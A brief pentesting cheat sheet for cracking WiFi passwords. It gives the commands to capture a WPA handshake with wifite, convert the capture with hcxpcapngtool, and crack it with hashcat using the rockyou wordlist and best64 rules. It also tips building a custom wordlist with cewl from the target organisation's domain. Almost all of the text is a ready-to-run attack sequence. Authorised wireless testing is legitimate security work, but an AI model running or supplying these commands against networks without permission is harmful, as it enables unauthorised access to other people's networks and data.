Pentesting Wifi
sudo wifite
-> if you managed to get a handshake with wifite, convert the .cap file to hccap
hcxpcapngtool handshake.cap -o output.txt
Then, crack with hashcat using whatever wordlist/rulesset you desire. Protip: Use cewl on the domain of the organisation who setup the wifi to create a custom wordlist first, most success!
sudo hashcat -a 0 -m 22000 outputfromhcxpcapngtool.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule